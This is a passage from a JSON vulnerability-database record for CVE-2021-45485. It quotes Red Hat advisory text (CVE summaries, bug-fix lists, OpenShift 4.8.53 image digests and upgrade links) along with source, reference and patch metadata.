shared\nsystem due to missing check in CheckAuthorization() code path\n(CVE-2022-24778)\n\n* golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)\n\n* node-fetch: exposure of sensitive information to an unauthorized actor\n(CVE-2022-0235)\n\n* nconf: Prototype pollution in memory store (CVE-2022-21803)\n\n* golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n(CVE-2022-23806)\n\n* nats-server: misusing the \"dynamically provisioned sandbox accounts\"\nfeature authenticated user can obtain the privileges of the System account\n(CVE-2022-24450)\n\n* Moment.js: Path traversal in moment.locale (CVE-2022-24785)\n\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n\n* go-getter: writes SSH credentials into logfile, exposing sensitive\ncredentials to local uses (CVE-2022-29810)\n\n* opencontainers: OCI manifest and index parsing confusion (CVE-2021-41190)\n\nBug fixes:\n\n* RFE Copy secret with specific secret namespace, name for source and name,\nnamespace and cluster label for target (BZ# 2014557)\n\n* RHACM 2.5.0 images (BZ# 2024938)\n\n* [UI] When you delete host agent from infraenv no confirmation message\nappear (Are you sure you want to delete x?) (BZ#2028348)\n\n* Clusters are in \u0027Degraded\u0027 status with upgrade env due to obs-controller\nnot working properly (BZ# 2028647)\n\n* create cluster pool -\u003e choose infra type, As a result infra providers\ndisappear from UI. (BZ# 2033339)\n\n* Restore/backup shows up as Validation failed but the restore backup\nstatus in ACM shows success (BZ# 2034279)\n\n* Observability - OCP 311 node role are not displayed completely (BZ#\n2038650)\n\n* Documented uninstall procedure leaves many leftovers (BZ# 2041921)\n\n* infrastructure-operator pod crashes due to insufficient privileges in ACM\n2.5 (BZ# 2046554)\n\n* Acm failed to install due to some missing CRDs in operator (BZ# 2047463)\n\n* Navigation icons no longer showing in ACM 2.5 (BZ# 2051298)\n\n* ACM home page now includes /home/ in url (BZ# 2051299)\n\n* proxy heading in Add Credential should be capitalized (BZ# 2051349)\n\n* ACM 2.5 tries to create new MCE instance when install on top of existing\nMCE 2.0 (BZ# 2051983)\n\n* Create Policy button does not work and user cannot use console to create\npolicy (BZ# 2053264)\n\n* No cluster information was displayed after a policyset was created (BZ#\n2053366)\n\n* Dynamic plugin update does not take effect in Firefox (BZ# 2053516)\n\n* Replicated policy should not be available when creating a Policy Set (BZ#\n2054431)\n\n* Placement section in Policy Set wizard does not reset when users click\n\"Back\" to re-configured placement (BZ# 2054433)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2014557 - RFE Copy secret with specific secret namespace, name for source and name, namespace and cluster label for target\n2024702 - CVE-2021-3918 nodejs-json-schema: Prototype pollution vulnerability\n2024938 - CVE-2021-41190 opencontainers: OCI manifest and index parsing confusion\n2028224 - RHACM 2.5.0 images\n2028348 - [UI] When you delete host agent from infraenv no confirmation message appear (Are you sure you want to delete x?)\n2028647 - Clusters are in \u0027Degraded\u0027 status with upgrade env due to obs-controller not working properly\n2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic\n2033339 - create cluster pool -\u003e choose infra type , As a result infra providers disappear from UI. \n2034279 - Restore/backup shows up as Validation failed but the restore backup status in ACM shows success\n2036252 - CVE-2021-43858 minio: user privilege escalation in AddUser() admin API\n2038650 - Observability - OCP 311 node role are not displayed completely\n2041921 - Documented uninstall procedure leaves many leftovers\n2044434 - CVE-2021-43816 containerd: Unprivileged pod may bind mount any privileged regular file on disk\n2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor\n2046554 - infrastructure-operator pod crashes due to insufficient privileges in ACM 2.5\n2047463 - Acm failed to install due to some missing CRDs in operator\n2051298 - Navigation icons no longer showing in ACM 2.5\n2051299 - ACM home page now includes /home/ in url\n2051349 - proxy heading in Add Credential should be capitalized\n2051983 - ACM 2.5 tries to create new MCE instance when install on top of existing MCE 2.0\n2052573 - CVE-2022-24450 nats-server: misusing the \"dynamically provisioned sandbox accounts\" feature  authenticated user can obtain the privileges of the System account\n2053264 - Create Policy button does not work and user cannot use console to create policy\n2053366 - No cluster information was displayed after a policyset was created\n2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements\n2053516 - Dynamic plugin update does not take effect in Firefox\n2054431 - Replicated policy should not be available when creating a Policy Set\n2054433 - Placement section in Policy Set wizard does not reset when users click \"Back\" to re-configured placement\n2054772 - credentialName is not parsed correctly in UI notifications/alerts when creating/updating a discovery config\n2054860 - Cluster overview page crashes for on-prem cluster\n2055333 - Unable to delete assisted-service operator\n2055900 - If MCH is installed on existing MCE and both are in multicluster-engine namespace , uninstalling MCH terminates multicluster-engine namespace\n2056485 - [UI]  In infraenv detail the host list don\u0027t have pagination\n2056701 - Non platform install fails agentclusterinstall CRD is outdated in rhacm2.5\n2057060 - [CAPI] Unable to create ClusterDeployment due to service account restrictions (ACM + Bundled Assisted)\n2058435 - Label cluster.open-cluster-management.io/backup-cluster stamped \u0027unknown\u0027 for velero backups\n2059779 - spec.nodeSelector is missing in MCE instance created by MCH upon installing ACM on infra nodes\n2059781 - Policy UI crashes when viewing details of configuration policies for backupschedule that does not exist\n2060135 - [assisted-install] agentServiceConfig left orphaned after uninstalling ACM\n2060151 - Policy set of the same name cannot be re-created after the previous one has been deleted\n2060230 - [UI] Delete host modal has incorrect host\u0027s name populated\n2060309 - multiclusterhub stuck in installing on \"ManagedClusterConditionAvailable\" [intermittent]\n2060469 - The development branch of the Submariner addon deploys 0.11.0, not 0.12.0\n2060550 - MCE installation hang due to no console-mce-console deployment available\n2060603 - prometheus doesn\u0027t display managed clusters\n2060831 - Observability - prometheus-operator failed to start on *KS\n2060934 - Cannot provision AWS OCP 4.9 cluster from Power Hub\n2061260 - The value of the policyset placement should be filtered space when input cluster label expression\n2061311 - Cleanup of installed spoke clusters hang on deletion of spoke namespace\n2061659 - the network section in create cluster -\u003e Networking include the brace in the network title\n2061798 - [ACM 2.5] The service of Cluster Proxy addon was missing\n2061838 - ACM component subscriptions are removed when enabling spec.disableHubSelfManagement in MCH\n2062009 - No name validation is performed on Policy and Policy Set Wizards\n2062022 - cluster.open-cluster-management.io/backup-cluster of velero schedules should populate the corresponding hub clusterID\n2062025 - No validation is done on yaml\u0027s format or content in Policy and Policy Set wizards\n2062202 - CVE-2022-0778 openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates\n2062337 - velero schedules get re-created after the backupschedule is in \u0027BackupCollision\u0027 phase\n2062462 - Upgrade to 2.5 hang due to irreconcilable errors of grc-sub and search-prod-sub in MCH\n2062556 - Always return the policyset page after created the policy from UI\n2062787 - Submariner Add-on UI does not indicate on Broker error\n2063055 - User with cluserrolebinding of open-cluster-management:cluster-manager-admin role can\u0027t see policies and clusters page\n2063341 - Release imagesets are missing in the console for ocp 4.10\n2063345 - Application Lifecycle- UI shows white blank page when the page is Refreshed\n2063596 - claim clusters from clusterpool throws errors\n2063599 - Update the message in clusterset -\u003e clusterpool page since we did not allow to add clusterpool to clusterset by resourceassignment\n2063697 - Observability - MCOCR reports object-storage secret without AWS access_key in STS enabled env\n2064231 - Can not clean the instance type for worker pool when create the clusters\n2064247 - prefer UI can add the architecture type when create the cluster\n2064392 - multicloud oauth-proxy failed to log users in on web\n2064477 - Click at \"Edit Policy\" for each policy leads to a blank page\n2064509 - No option to view the ansible job details and its history in the Automation wizard after creation of the automation job\n2064516 - Unable to delete an automation job of a policy\n2064528 - Columns of Policy Set, Status and Source on Policy page are not sortable\n2064535 - Different messages on the empty pages of Overview and Clusters when policy is disabled\n2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server\n2064722 - [Tracker] [DR][ACM 2.5] Applications are not getting deployed on managed cluster\n2064899 - Failed to provision openshift 4.10 on bare metal\n2065436 - \"Filter\" drop-down list does not show entries of the policies that have no top-level remediation specified\n2066198 - Issues about disabled policy from UI\n2066207 - The new created policy should be always shown up on the first line\n2066333 - The message was confuse when the cluster status is Running\n2066383 - MCE install failing on proxy disconnected environment\n2066433 - Logout not working for ACM 2.5\n2066464 - console-mce-console pods throw ImagePullError after upgrading to ocp 4.10\n2066475 - User with view-only rolebinding should not be allowed to create policy, policy set and automation job\n2066544 - The search box can\u0027t work properly in Policies page\n2066594 - RFE:  Can\u0027t open the helm source link of the backup-restore-enabled policy from UI\n2066650 - minor issues in cluster curator due to the startup throws errors\n2066751 - the image repo of application-manager did not updated to use the image repo in MCE/MCH configuration\n2066834 - Hibernating cluster(s) in cluster pool stuck in \u0027Stopping\u0027 status after restore activation\n2066842 - cluster pool credentials are not backed up\n2066914 - Unable to remove cluster value during configuration of the label expressions for policy and policy set\n2066940 - Validation fired out for https proxy when the link provided not starting with https\n2066965 - No message is displayed in Policy Wizard to indicate a policy externally managed\n2066979 - MIssing groups in policy filter options comparing to previous RHACM version\n2067053 - I was not able to remove the image mirror content when create the cluster\n2067067 - Can\u0027t filter the cluster info when clicked the cluster in the Placement section\n2067207 - Bare metal asset secrets are not backed up\n2067465 - Categories,Standards, and Controls annotations are not updated after user has deleted a selected template\n2067713 - Columns on policy\u0027s \"Results\" are not sort-able as in previous release\n2067728 - Can\u0027t search in the policy creation or policyset creation Yaml editor\n2068304 - Application Lifecycle- Replicasets arent showing the logs console in Topology\n2068309 - For policy wizard in dynamics plugin environment, buttons at the bottom should be sticky and the contents of the Policy should scroll\n2068312 - Application Lifecycle - Argo Apps are not showing overview details and topology after upgrading from 2.4\n2068313 - Application Lifecycle - Refreshing overview page leads to a blank page\n2068328 - A cluster\u0027s \"View history\" page should not contain all clusters\u0027 violations history\n2068387 - Observability - observability operator always CrashLoopBackOff in FIPS upgrading hub\n2068993 - Observability - Node list is not filtered according to nodeType on OCP 311 dashboard\n2069329 - config-policy-controller addon with \"Unknown\" status in OCP 3.11 managed cluster after upgrade hub to 2.5\n2069368 - CVE-2022-24778 imgcrypt: Unauthorized access to encryted container image on a shared system due to missing check in CheckAuthorization() code path\n2069469 - Status of unreachable clusters is not reported in several places on GRC panels\n2069615 - The YAML editor can\u0027t work well when login UI using dynamic console plugin\n2069622 - No validation for policy template\u0027s name\n2069698 - After claim a cluster from clusterpool, the cluster pages become very very slow\n2069867 - Error occurs when trying to edit an application set/subscription\n2069870 - ACM/MCE Dynamic Plugins - 404: Page Not Found Error Occurs - intermittent crashing\n2069875 - Cluster secrets are not being created in the managed cluster\u0027s namespace\n2069895 - Application Lifecycle - Replicaset and Pods gives error messages when Yaml is selected on sidebar\n2070203 - Blank Application is shown when editing an Application with AnsibleJobs\n2070782 - Failed Secret Propagation to the Same Namespace as the AnsibleJob CR\n2070846 - [ACM 2.5] Can\u0027t re-add the default clusterset label after removing it from a managedcluster on BM SNO hub\n2071066 - Policy set details panel does not work when deployed into namespace different than \"default\"\n2071173 - Configured RunOnce automation job is not displayed although the policy has no violation\n2071191 - MIssing title on details panel after clicking \"view details\" of a policy set card\n2071769 - Placement must be always configured or error is reported when creating a policy\n2071818 - ACM logo not displayed in About info modal\n2071869 - Topology includes the status of local cluster resources when Application is only deployed to managed cluster\n2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale\n2072097 - Local Cluster is shown as Remote on the Application Overview Page and Single App Overview Page\n2072104 - Inconsistent \"Not Deployed\" Icon Used Between 2.4 and 2.5 as well as the Overview and Topology\n2072177 - Cluster Resource Status is showing App Definition Statuses as well\n2072227 - Sidebar Statuses Need to Be Updated to Reflect Cluster List and Cluster Resource Statuses\n2072231 - Local Cluster not included in the appsubreport for Helm Applications Deployed on All Clusters\n2072334 - Redirect URL is now to the details page after created a policy\n2072342 - Shows \"NaN%\" in the ring chart when add the disabled policy into policyset and view its details\n2072350 - CRD Deployed via Application Console does not have correct deployment status and spelling\n2072359 - Report the error when editing compliance type in the YAML editor and then submit the changes\n2072504 - The policy has violations on the failed managed cluster\n2072551 - URL dropdown is not being rendered with an Argo App with a new URL\n2072773 - When a channel is deleted and recreated through the App Wizard, application creation stalls and warning pops up\n2072824 - The edit/delete policyset button should be greyed when using viewer check\n2072829 - When Argo App with jsonnet object is deployed, topology and cluster status would fail to display the correct statuses. \n2073179 - Policy controller was unable to retrieve violation status in for an OCP 3.11 managed cluster on ARM hub\n2073330 - Observabilityy - memory usage data are not collected even collect rule is fired on SNO\n2073355 - Get blank page when click policy with unknown status in Governance -\u003e Overview page\n2073508 - Thread responsible to get insights data from *ks clusters is broken\n2073557 - appsubstatus is not deleted for Helm applications when changing between 2 managed clusters\n2073726 - Placement of First Subscription gets overlapped by the Cluster Node in Application Topology\n2073739 - Console/App LC - Error message saying resource conflict only shows up in standalone ACM but not in Dynamic plugin\n2073740 - Console/App LC- Apps are deployed even though deployment do not proceed because of \"resource conflict\" error\n2074178 - Editing Helm Argo Applications does not Prune Old Resources\n2074626 - Policy placement failure during ZTP SNO scale test\n2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store\n2074803 - The import cluster YAML editor shows the klusterletaddonconfig was required on MCE portal\n2074937 - UI allows creating cluster even when there are no ClusterImageSets\n2075416 - infraEnv failed to create image after restore\n2075440 - The policyreport CR is created for spoke clusters until restarted the insights-client pod\n2075739 - The lookup function won\u0027t check the referred resource whether exist when using template policies\n2076421 - Can\u0027t select existing placement for policy or policyset when editing policy or policyset\n2076494 - No policyreport CR for spoke clusters generated  in the disconnected env\n2076502 - The policyset card doesn\u0027t show the cluster status(violation/without violation) again after deleted one policy\n2077144 - GRC Ansible automation wizard does not display error of missing dependent Ansible Automation Platform operator\n2077149 - App UI shows no clusters cluster column of App Table when Discovery Applications is deployed to a managed cluster\n2077291 - Prometheus doesn\u0027t display acm_managed_cluster_info after upgrade from 2.4 to 2.5\n2077304 - Create Cluster button is disabled only if other clusters exist\n2077526 - ACM UI is very very slow after upgrade from 2.4 to 2.5\n2077562 - Console/App LC- Helm and Object bucket applications are not showing as deployed in the UI\n2077751 - Can\u0027t create a template policy from UI when the object\u0027s name is referring Golang text template syntax in this policy\n2077783 - Still show violation for clusterserviceversions after enforced \"Detect Image vulnerabilities \" policy template and the operator is installed\n2077951 - Misleading message indicated that a placement of a policy became one managed only by policy set\n2078164 - Failed to edit a policy without placement\n2078167 - Placement binding and rule names are not created in yaml when editing a policy previously created with no placement\n2078373 - Disable the hyperlink of *ks node in standalone MCE environment since the search component was not exists\n2078617 - Azure public credential details get pre-populated with base domain name in UI\n2078952 - View pod logs in search details returns error\n2078973 - Crashed pod is marked with success in Topology\n2079013 - Changing existing placement rules does not change YAML file\n2079015 - Uninstall pod crashed when destroying Azure Gov cluster in ACM\n2079421 - Hyphen(s) is deleted unexpectedly in UI when yaml is turned on\n2079494 - Hitting Enter in yaml editor caused unexpected keys \"key00x:\" to be created\n2079533 - Clusters with no default clusterset do not get assigned default cluster when upgrading from ACM 2.4 to 2.5\n2079585 - When an Ansible Secret is propagated to an Ansible Application namespace, the propagated secret is shown in the Credentials page\n2079611 - Edit appset placement in UI with a different existing placement causes the current associated placement being deleted\n2079615 - Edit appset placement in UI with a new placement throws error upon submitting\n2079658 - Cluster Count is Incorrect in Application UI\n2079909 - Wrong message is displayed when GRC fails to connect to an ansible tower\n2080172 - Still create policy automation successfully when the PolicyAutomation name exceed 63 characters\n2080215 - Get a blank page after go to policies page in upgraded env when using an user with namespace-role-binding of default view role\n2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses\n2080503 - vSphere network name doesn\u0027t allow entering spaces and doesn\u0027t reflect YAML changes\n2080567 - Number of cluster in violation in the table does not match other cluster numbers on the policy set details page\n2080712 - Select an existing placement configuration does not work\n2080776 - Unrecognized characters are displayed on policy and policy set yaml editors\n2081792 - When deploying an application to a clusterpool claimed cluster after upgrade, the application does not get deployed to the cluster\n2081810 - Type \u0027-\u0027 character in Name field caused previously typed character backspaced in  in the name field of policy wizard\n2081829 - Application deployed on local cluster\u0027s topology is crashing after upgrade\n2081938 - The deleted policy still be shown on the policyset review page when edit this policy set\n2082226 - Object Storage Topology includes residue of resources after Upgrade\n2082409 - Policy set details panel remains even after the policy set has been deleted\n2082449 - The hypershift-addon-agent deployment did not have imagePullSecrets\n2083038 - Warning still refers to the `klusterlet-addon-appmgr` pod rather than the `application-manager` pod\n2083160 - When editing a helm app with failing resources to another, the appsubstatus and the managedclusterview do not get updated\n2083434 - The provider-credential-controller did not support the RHV credentials type\n2083854 - When deploying an application with ansiblejobs multiple times with different namespaces, the topology shows all the ansiblejobs rather than just the one within the namespace\n2083870 - When editing an existing application and refreshing the `Select an existing placement configuration`, multiple occurrences of the placementrule gets displayed\n2084034 - The status message looks messy in the policy set card, suggest one kind status one a row\n2084158 - Support provisioning bm cluster where no provisioning network provided\n2084622 - Local Helm application shows cluster resources as `Not Deployed` in Topology [Upgrade]\n2085083 - Policies fail to copy to cluster namespace after ACM upgrade\n2085237 - Resources referenced by a channel are not annotated with backup label\n2085273 - Error querying for ansible job in app topology\n2085281 - Template name error is reported but the template name was found in a different replicated policy\n2086389 - The policy violations for hibernated cluster still be displayed on the policy set details page\n2087515 - Validation thrown out in configuration for disconnect install while creating bm credential\n2088158 - Object Storage Application deployed to all clusters is showing unemployed in topology [Upgrade]\n2088511 - Some cluster resources are not showing labels that are defined in the YAML\n\n5. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.8.53. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2022:7873\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nSecurity Fix(es):\n\n* go-getter: command injection vulnerability (CVE-2022-26945)\n* go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)\n* go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)\n* go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section. Solution:\n\nFor OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nYou may download the oc tool and use it to inspect release image metadata\nfor x86_64, s390x, and ppc64le architectures. The image digests\nmay be found at\nhttps://quay.io/repository/openshift-release-dev/ocp-release?tab=tags\n\nThe sha values for the release are:\n\n(For x86_64 architecture)\nThe image digest is\nsha256:ac2bbfa7036c64bbdb44f9a74df3dbafcff1b851d812bf2a48c4fabcac3c7a53\n\n(For s390x architecture)\nThe image digest is\nsha256:ac2c74a664257cea299126d4f789cdf9a5a4efc4a4e8c2361b943374d4eb21e4\n\n(For ppc64le architecture)\nThe image digest is\nsha256:53adc42ed30ad39d7117837dbf5a6db6943a8f0b3b61bc0d046b83394f5c28b2\n\nAll OpenShift Container Platform 4.8 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2077100 - Console backend check for Web Terminal Operator incorrectly returns HTTP 204\n2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)\n2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)\n2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)\n2092928 - CVE-2022-26945 go-getter: command injection vulnerability\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nOCPBUGS-2205 - Prefer local dns does not work expectedly on OCPv4.8\nOCPBUGS-2347 - [cluster-api-provider-baremetal] fix 4.8 build\nOCPBUGS-2577 - [4.8] ETCD Operator goes degraded when a second internal node ip is added\nOCPBUGS-2773 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name\nOCPBUGS-2989 - [4.8] cri-o should report the stage of container and pod creation it\u0027s stuck at\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-45485"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "db": "VULHUB",
        "id": "VHN-409116"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-45485"
      },
      {
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "db": "PACKETSTORM",
        "id": "167330"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "167459"
      },
      {
        "db": "PACKETSTORM",
        "id": "169941"
      }
    ],
    "trust": 2.43
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-45485",
        "trust": 4.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169941",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "169695",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "169997",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "169719",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166101",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "169411",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0205",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.5536",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1225",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.6062",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0215",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.0061",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0380",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.6111",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.2855",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0615",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.3236",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.3136",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0121",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.5590",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022070643",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022062931",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2265",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-409116",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-45485",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167097",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167622",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167072",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167330",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167679",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167459",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-409116"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-45485"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "db": "PACKETSTORM",
        "id": "167622"
      },
      {
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "db": "PACKETSTORM",
        "id": "167330"
      },
      {
        "db": "PACKETSTORM",
        "id": "167679"
      },
      {
        "db": "PACKETSTORM",
        "id": "167459"
      },
      {
        "db": "PACKETSTORM",
        "id": "169941"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2265"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-45485"
      }
    ]
  },
  "id": "VAR-202112-2255",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-409116"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:30:28.280000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "NTAP-20220121-0001",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.13.3"
      },
      {
        "title": "Linux kernel Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=177039"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20226983 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20226991 - security advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Virtualization 4.9.7 Images security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20228609 - security advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Container Platform 4.8.53 bug fix and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20227874 - security advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Container Platform 4.10.39 bug fix and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20227211 - security advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Container Platform 4.9.51 bug fix and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20227216 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: USN-5299-1: Linux kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-5299-1"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20221988 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.6.5 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20224814 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.7.2 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20225483 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.4.5 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20225201 - security advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat Advanced Cluster Management 2.5 security updates, images, and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20224956 - security advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.11 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20225392 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: USN-5343-1: Linux kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-5343-1"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/syrti/poc_to_review "
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/trhacknon/pocingit "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-45485"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-017434"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2265"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
